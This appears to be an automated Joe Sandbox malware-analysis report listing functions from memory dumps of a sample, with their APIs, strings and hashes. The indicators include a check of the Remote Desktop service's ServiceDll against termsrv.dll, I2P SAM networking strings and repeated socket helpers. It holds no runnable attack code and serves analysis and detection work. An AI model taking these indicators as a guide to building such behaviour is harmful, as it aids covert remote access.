Opcode Fuzzy Hash: fd5638db403456608400802e24ae7212d6ef097be0609a3bcd527b22d91f44d7
Instruction Fuzzy Hash: 42F0B497F0A943C0FA02A7A6E8302B622409F21BF8F640331D53E513E3AE1CE8468309

Function 00007FFDA55A5DD0 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 50stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FFDA55A5192: RegOpenKeyExA.ADVAPI32 ref: 00007FFDA55A51EC

strlen.MSVCRT ref: 00007FFDA55A5E22
strcmp.MSVCRT ref: 00007FFDA55A5E57

Strings

ServiceDll, xrefs: 00007FFDA55A5DF9
termsrv.dll, xrefs: 00007FFDA55A5E50
SYSTEM\CurrentControlSet\Services\TermService\Parameters, xrefs: 00007FFDA55A5E00

Memory Dump Source

Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true

Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd

Similarity

API ID: Openstrcmpstrlen
String ID: SYSTEM\CurrentControlSet\Services\TermService\Parameters$ServiceDll$termsrv.dll
API String ID: 679246061-1413152910
Opcode ID: 8b43859d3751d4cfc2d3ca6901e27b712851a733f46dae56a8f51d62b50b9964
Instruction ID: 510644335e0b3884e0eadb8a87a793c0ba32e81dc8d0c34634c67257b76d8bfe
Opcode Fuzzy Hash: 8b43859d3751d4cfc2d3ca6901e27b712851a733f46dae56a8f51d62b50b9964
Instruction Fuzzy Hash: 1221547970DA8B90EE328F10A4687F96351AF61B44F840432E75D427DBEF3DD649C608

Function 00007FFDA55AACA9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33networkCOMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32 ref: 00007FFDA55AACCF
WSAGetLastError.WS2_32 ref: 00007FFDA55AACED

Part of subcall function 00007FFDA55AC852: fwrite.MSVCRT ref: 00007FFDA55AC8FE
Part of subcall function 00007FFDA55AC852: fflush.MSVCRT ref: 00007FFDA55AC90A

Strings

[E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFDA55AAD04
sock_set_blocking, xrefs: 00007FFDA55AACFD

Memory Dump Source

Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true

Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd

Similarity

API ID: ErrorLastfflushfwriteioctlsocket
String ID: [E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d)$sock_set_blocking
API String ID: 325303940-110789774
Opcode ID: 92e08edd5a5daf7e63f80c7fae908792988ffd416df67f6328fc22065d655c4c
Instruction ID: 43e7869702244b93328e225611b873b80ca7b7df92004df46d68eac92f3bc51a
Opcode Fuzzy Hash: 92e08edd5a5daf7e63f80c7fae908792988ffd416df67f6328fc22065d655c4c
Instruction Fuzzy Hash: 7BF02868F0E10E47F3120F25E8243752150AB85F60F048231ED2E833D2EE7DE8468304

Function 00007FFDA55D1D99 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33networkCOMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32 ref: 00007FFDA55D1DBF
WSAGetLastError.WS2_32 ref: 00007FFDA55D1DDD

Part of subcall function 00007FFDA55D9DC2: fwrite.MSVCRT ref: 00007FFDA55D9E6E
Part of subcall function 00007FFDA55D9DC2: fflush.MSVCRT ref: 00007FFDA55D9E7A

Strings

[E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFDA55D1DF4
sock_set_blocking, xrefs: 00007FFDA55D1DED

Memory Dump Source

Source File: 00000018.00000002.2877372074.00007FFDA55D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA55D0000, based on PE: true

Associated: 00000018.00000002.2877320076.00007FFDA55D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877397180.00007FFDA55E3000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877418496.00007FFDA55EC000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877440603.00007FFDA55EF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877460137.00007FFDA55F0000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55d0000_main.jbxd

Similarity

API ID: ErrorLastfflushfwriteioctlsocket
String ID: [E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d)$sock_set_blocking
API String ID: 325303940-110789774
Opcode ID: 42c91134043cb90703c73a4a96ae32b202fc7c6bacb2177fd54e0efb9be6e790
Instruction ID: 6c765bfd869f5920777f005b278e8f7561614396d446768946453d95361f3918
Opcode Fuzzy Hash: 42c91134043cb90703c73a4a96ae32b202fc7c6bacb2177fd54e0efb9be6e790
Instruction Fuzzy Hash: AAF0FC6BF0D64A86F711EF65B4103751160AF96F94F144131ED1D83396DE3CE846C704

Function 00007FFDAC0F3F89 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33networkCOMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32 ref: 00007FFDAC0F3FAF
WSAGetLastError.WS2_32 ref: 00007FFDAC0F3FCD

Part of subcall function 00007FFDAC0F1352: fwrite.MSVCRT ref: 00007FFDAC0F13FE
Part of subcall function 00007FFDAC0F1352: fflush.MSVCRT ref: 00007FFDAC0F140A

Strings

sock_set_blocking, xrefs: 00007FFDAC0F3FDD
[E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFDAC0F3FE4

Memory Dump Source

Source File: 00000018.00000002.2877621388.00007FFDAC0F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFDAC0F0000, based on PE: true

Associated: 00000018.00000002.2877603061.00007FFDAC0F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877645741.00007FFDAC102000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877665816.00007FFDAC10B000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877685903.00007FFDAC10E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877704160.00007FFDAC10F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877722830.00007FFDAC112000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffdac0f0000_main.jbxd

Similarity

API ID: ErrorLastfflushfwriteioctlsocket
String ID: [E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d)$sock_set_blocking
API String ID: 325303940-110789774
Opcode ID: 849be9b46ed46a113805540b2f03b8632a367a887648f154da5816180634933e
Instruction ID: 6eb27086a03a9d32b088c171b3a5853ad9dde8b1cd0e54c9dd92af79bd00a6bd
Opcode Fuzzy Hash: 849be9b46ed46a113805540b2f03b8632a367a887648f154da5816180634933e
Instruction Fuzzy Hash: E6F0C862B0E11382F315571DA8101796160AB947F4F144131EC2D837A6DF3CD99A9709

Function 00007FFDA55756D9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33networkCOMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32 ref: 00007FFDA55756FF
WSAGetLastError.WS2_32 ref: 00007FFDA557571D

Part of subcall function 00007FFDA55740D2: fwrite.MSVCRT ref: 00007FFDA557417E
Part of subcall function 00007FFDA55740D2: fflush.MSVCRT ref: 00007FFDA557418A

Strings

[E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFDA5575734
sock_set_blocking, xrefs: 00007FFDA557572D

Memory Dump Source

Source File: 00000018.00000002.2877001034.00007FFDA5571000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFDA5570000, based on PE: true

Associated: 00000018.00000002.2876982499.00007FFDA5570000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877024032.00007FFDA5584000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877044088.00007FFDA558D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877061446.00007FFDA5590000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877078821.00007FFDA5591000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda5570000_main.jbxd

Similarity

API ID: ErrorLastfflushfwriteioctlsocket
String ID: [E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d)$sock_set_blocking
API String ID: 325303940-110789774
Opcode ID: 30f1aec4ba2a2d192909e359bf6bdff320714bbc25446a42e4e5d0e7bd6f73df
Instruction ID: 96c02df68d4a5746b3884654111ce6faac0515f6e5e605ce1455944889ed4f20
Opcode Fuzzy Hash: 30f1aec4ba2a2d192909e359bf6bdff320714bbc25446a42e4e5d0e7bd6f73df
Instruction Fuzzy Hash: 53F0C869B1E10782F3514F65A8503695260AF96B94F104571DC1E837A6DF3CD8468708

Function 00007FFDA5BA26B9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33networkCOMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32 ref: 00007FFDA5BA26DF
WSAGetLastError.WS2_32 ref: 00007FFDA5BA26FD

Part of subcall function 00007FFDA5BA2072: fwrite.MSVCRT ref: 00007FFDA5BA211E
Part of subcall function 00007FFDA5BA2072: fflush.MSVCRT ref: 00007FFDA5BA212A

Strings

[E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFDA5BA2714
sock_set_blocking, xrefs: 00007FFDA5BA270D

Memory Dump Source

Source File: 00000018.00000002.2877497237.00007FFDA5BA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFDA5BA0000, based on PE: true

Associated: 00000018.00000002.2877479127.00007FFDA5BA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877517769.00007FFDA5BB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877541333.00007FFDA5BB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877562004.00007FFDA5BBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877582176.00007FFDA5BBC000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda5ba0000_main.jbxd

Similarity

API ID: ErrorLastfflushfwriteioctlsocket
String ID: [E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d)$sock_set_blocking
API String ID: 325303940-110789774
Opcode ID: 3bac57ab07ab6fa09b49fa917161877b71d61bac53155766da67bea0fd302a75
Instruction ID: c64bde14cc31b08e0690adbaa0598c23149b4236ecf33881caa42d3ff452b311
Opcode Fuzzy Hash: 3bac57ab07ab6fa09b49fa917161877b71d61bac53155766da67bea0fd302a75
Instruction Fuzzy Hash: A0F06861F0A54A47F7105B1DA8203B65160ABD5B96F118231FD1E43796DD7DD8468708

Function 00007FFDAC1213F9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33networkCOMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32 ref: 00007FFDAC12141F
WSAGetLastError.WS2_32 ref: 00007FFDAC12143D

Part of subcall function 00007FFDAC1277A2: fwrite.MSVCRT ref: 00007FFDAC12784E
Part of subcall function 00007FFDAC1277A2: fflush.MSVCRT ref: 00007FFDAC12785A

Strings

[E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFDAC121454
sock_set_blocking, xrefs: 00007FFDAC12144D

Memory Dump Source

Source File: 00000018.00000002.2877759914.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true

Associated: 00000018.00000002.2877741063.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877782121.00007FFDAC133000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877800925.00007FFDAC134000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877820251.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877861990.00007FFDAC140000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877881610.00007FFDAC141000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877900519.00007FFDAC144000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffdac120000_main.jbxd

Similarity

API ID: ErrorLastfflushfwriteioctlsocket
String ID: [E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d)$sock_set_blocking
API String ID: 325303940-110789774
Opcode ID: 6a165083d59680d293bd1d3c3314456fe647c5da576488af89c7f0863e1abcf1
Instruction ID: 2f0f0d85704f77d8f965256142e91bc5d2d07c02fde0cb53ad6cabd5a325e760
Opcode Fuzzy Hash: 6a165083d59680d293bd1d3c3314456fe647c5da576488af89c7f0863e1abcf1
Instruction Fuzzy Hash: E4F0F6A7F0D54242F352976AB8202B61560AF947F4F604231EC1E83796EE3CED478709

Function 00007FFDA55AADDA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32networkCOMMON

Download Yara Rule

APIs

setsockopt.WS2_32 ref: 00007FFDA55AAE0A
WSAGetLastError.WS2_32 ref: 00007FFDA55AAE21

Strings

[E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFDA55AAE38
tcp_set_nodelay, xrefs: 00007FFDA55AAE31

Memory Dump Source

Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true

Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd

Similarity

API ID: ErrorLastsetsockopt
String ID: [E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_nodelay
API String ID: 1729277954-3534120083
Opcode ID: 41e517d12728adeed715081d1714c0f6129ea13c495914380e507ba7e152d11b
Instruction ID: 4bc7e783954bd7383f91a79794301f3c85fec5650a31ba004a4ff0dd15b701a8
Opcode Fuzzy Hash: 41e517d12728adeed715081d1714c0f6129ea13c495914380e507ba7e152d11b
Instruction Fuzzy Hash: 3EF02B75B0914A8AF3115F26F8143A62660BB85B60F008231EE5D83BD6DF7CD94ACB04

Function 00007FFDA55D1ECA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32networkCOMMON

Download Yara Rule

APIs

setsockopt.WS2_32 ref: 00007FFDA55D1EFA
WSAGetLastError.WS2_32 ref: 00007FFDA55D1F11

Strings

[E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFDA55D1F28
tcp_set_nodelay, xrefs: 00007FFDA55D1F21

Memory Dump Source

Source File: 00000018.00000002.2877372074.00007FFDA55D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA55D0000, based on PE: true

Associated: 00000018.00000002.2877320076.00007FFDA55D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877397180.00007FFDA55E3000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877418496.00007FFDA55EC000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877440603.00007FFDA55EF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877460137.00007FFDA55F0000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55d0000_main.jbxd

Similarity

API ID: ErrorLastsetsockopt
String ID: [E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_nodelay
API String ID: 1729277954-3534120083
Opcode ID: 6c3eab3f1bb56b1379cccb35bccdbd326483b553a18c474a00197300edf8b18a
Instruction ID: b95cc8c36a4d00defe2f1a91820f6827185037fe56151c00685d1e31be376445
Opcode Fuzzy Hash: 6c3eab3f1bb56b1379cccb35bccdbd326483b553a18c474a00197300edf8b18a
Instruction Fuzzy Hash: 7BF0F6A7B0A1468AF311DF25F8107A56560EF89B54F044231EE5D83796EF3CD556CB04

Function 00007FFDAC0F40BA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32networkCOMMON

Download Yara Rule

APIs

setsockopt.WS2_32 ref: 00007FFDAC0F40EA
WSAGetLastError.WS2_32 ref: 00007FFDAC0F4101

Strings

[E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFDAC0F4118
tcp_set_nodelay, xrefs: 00007FFDAC0F4111

Memory Dump Source

Source File: 00000018.00000002.2877621388.00007FFDAC0F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFDAC0F0000, based on PE: true

Associated: 00000018.00000002.2877603061.00007FFDAC0F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877645741.00007FFDAC102000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877665816.00007FFDAC10B000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877685903.00007FFDAC10E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877704160.00007FFDAC10F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877722830.00007FFDAC112000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffdac0f0000_main.jbxd

Similarity

API ID: ErrorLastsetsockopt
String ID: [E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_nodelay
API String ID: 1729277954-3534120083
Opcode ID: 19e9ab1836074a3352b32a52632690611a7abb063b1ae5ff54d4238178453e0b
Instruction ID: 6f89aba5a27ad86250d751fbb02c1bb104c3ca55f514219b9f43daa839da76ec
Opcode Fuzzy Hash: 19e9ab1836074a3352b32a52632690611a7abb063b1ae5ff54d4238178453e0b
Instruction Fuzzy Hash: EFF02B62B0A50286F3105F2AB8105A62560FF847F4F44C231ED6D837D6DF7CD69AD708

Function 00007FFDA557580A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32networkCOMMON

Download Yara Rule

APIs

setsockopt.WS2_32 ref: 00007FFDA557583A
WSAGetLastError.WS2_32 ref: 00007FFDA5575851

Strings

[E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFDA5575868
tcp_set_nodelay, xrefs: 00007FFDA5575861

Memory Dump Source

Source File: 00000018.00000002.2877001034.00007FFDA5571000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFDA5570000, based on PE: true

Associated: 00000018.00000002.2876982499.00007FFDA5570000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877024032.00007FFDA5584000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877044088.00007FFDA558D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877061446.00007FFDA5590000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877078821.00007FFDA5591000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda5570000_main.jbxd

Similarity

API ID: ErrorLastsetsockopt
String ID: [E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_nodelay
API String ID: 1729277954-3534120083
Opcode ID: 6a0c773874180e26880ab9408dde3e1e82a1a78c10ef0331ebf13dd642ca3944
Instruction ID: de04a9a91763d3175e89fd488f34b9b4402ad6fc97869f506b36eac754de390d
Opcode Fuzzy Hash: 6a0c773874180e26880ab9408dde3e1e82a1a78c10ef0331ebf13dd642ca3944
Instruction Fuzzy Hash: DDF08B65B0D10B87F3115F26B8103B62660BB95B60F004235ED2C837A6CF3CD54ACB04

Function 00007FFDA5BA27EA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32networkCOMMON

Download Yara Rule

APIs

setsockopt.WS2_32 ref: 00007FFDA5BA281A
WSAGetLastError.WS2_32 ref: 00007FFDA5BA2831

Strings

[E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFDA5BA2848
tcp_set_nodelay, xrefs: 00007FFDA5BA2841

Memory Dump Source

Source File: 00000018.00000002.2877497237.00007FFDA5BA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFDA5BA0000, based on PE: true

Associated: 00000018.00000002.2877479127.00007FFDA5BA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877517769.00007FFDA5BB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877541333.00007FFDA5BB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877562004.00007FFDA5BBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877582176.00007FFDA5BBC000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda5ba0000_main.jbxd

Similarity

API ID: ErrorLastsetsockopt
String ID: [E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_nodelay
API String ID: 1729277954-3534120083
Opcode ID: 702f1731c740baea6aa01d70a6d9364a69a7575be2623aa0b7b7a230db5d70ac
Instruction ID: 01cd6f515cb9c6ad787fa572e3fe4df7f337751830db9074e83d6ea86c98be3e
Opcode Fuzzy Hash: 702f1731c740baea6aa01d70a6d9364a69a7575be2623aa0b7b7a230db5d70ac
Instruction Fuzzy Hash: 70F02B61F0910E8BF7105B26F8107B6A660FB85B91F408231FE6D83796DE7CD54ACB04

Function 00007FFDAC12152A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32networkCOMMON

Download Yara Rule

APIs

setsockopt.WS2_32 ref: 00007FFDAC12155A
WSAGetLastError.WS2_32 ref: 00007FFDAC121571

Strings

tcp_set_nodelay, xrefs: 00007FFDAC121581
[E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFDAC121588

Memory Dump Source

Source File: 00000018.00000002.2877759914.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true

Associated: 00000018.00000002.2877741063.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877782121.00007FFDAC133000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877800925.00007FFDAC134000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877820251.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877861990.00007FFDAC140000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877881610.00007FFDAC141000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877900519.00007FFDAC144000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffdac120000_main.jbxd

Similarity

API ID: ErrorLastsetsockopt
String ID: [E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_nodelay
API String ID: 1729277954-3534120083
Opcode ID: 63126c6e928a2edf30332fec70366c77f6c68d58c758049f5329ce28a99afd50
Instruction ID: 594272345cdaaf591b4428b925bda64ff2b8239efd3604ab03efd12ce4a90584
Opcode Fuzzy Hash: 63126c6e928a2edf30332fec70366c77f6c68d58c758049f5329ce28a99afd50
Instruction Fuzzy Hash: C3F0F6A3B095028AF3119F16F8102A66660AB847F4F104231ED6D8379ADE3CD94ACB08

Function 00007FFDAC121596 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 29networkCOMMON

Download Yara Rule

APIs

setsockopt.WS2_32 ref: 00007FFDAC1215BE
WSAGetLastError.WS2_32 ref: 00007FFDAC1215D5

Strings

[E] (%s) -> setsockopt(SO_KEEPALIVE) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFDAC1215EC
tcp_set_keepalive, xrefs: 00007FFDAC1215E5

Memory Dump Source

Source File: 00000018.00000002.2877759914.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true

Associated: 00000018.00000002.2877741063.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877782121.00007FFDAC133000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877800925.00007FFDAC134000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877820251.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877861990.00007FFDAC140000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877881610.00007FFDAC141000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877900519.00007FFDAC144000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffdac120000_main.jbxd

Similarity

API ID: ErrorLastsetsockopt
String ID: [E] (%s) -> setsockopt(SO_KEEPALIVE) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_keepalive
API String ID: 1729277954-536111009
Opcode ID: 7e63a788dda2df7644049a30458bce2b8fead849c875d8bc733ebdb9195ad845
Instruction ID: edc4245068883e546cd160a2e5e5ae67a206a7f519593778fe19067523084a47
Opcode Fuzzy Hash: 7e63a788dda2df7644049a30458bce2b8fead849c875d8bc733ebdb9195ad845
Instruction Fuzzy Hash: 5DF024B3B1954286F3619F17F8001666AA0BF887F4F108231ED6D837A5DE3CC80A8B08

Function 00007FFDAC12B132 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 72stringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FFDAC12B16B
strchr.MSVCRT ref: 00007FFDAC12B1B7

Strings

sam3_recv_rsp, xrefs: 00007FFDAC12B1D1
[D] (%s) -> %s, xrefs: 00007FFDAC12B1D8

Memory Dump Source

Source File: 00000018.00000002.2877759914.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true

Associated: 00000018.00000002.2877741063.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877782121.00007FFDAC133000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877800925.00007FFDAC134000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877820251.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877861990.00007FFDAC140000.00000004.00000001.01000000.00000009.sdmpDownload File
